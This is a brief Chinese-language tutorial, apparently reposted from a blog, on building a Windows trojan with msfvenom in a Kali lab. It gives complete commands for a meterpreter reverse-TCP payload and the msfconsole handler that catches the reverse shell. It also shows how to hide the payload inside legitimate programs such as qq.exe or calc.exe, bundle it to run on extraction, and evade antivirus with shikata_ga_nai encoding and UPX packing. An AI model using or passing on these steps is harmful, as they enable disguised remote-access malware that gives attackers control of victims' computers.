msfvenom木马生成

实验环境:

kali、winxp

生成木马文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -f exe > a.exe


打开msfconsole,等待文件执行弹回shell

use exploit/multi/hander

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set lhost ip

set lport x

exploit


文件隐藏处理
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -x qq.exe -k -f exe -o qq.exe

文件隐藏处理还可以和其他文件打包一起,解压文件时自动执行木马程序

文件免杀加壳处理
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -x calc.exe lhost=ip lport=4444 -f exe -o calc2.exe
upx -5 qq.exe

原文地址:https://www.cnblogs.com/f1veseven/p/13566508.html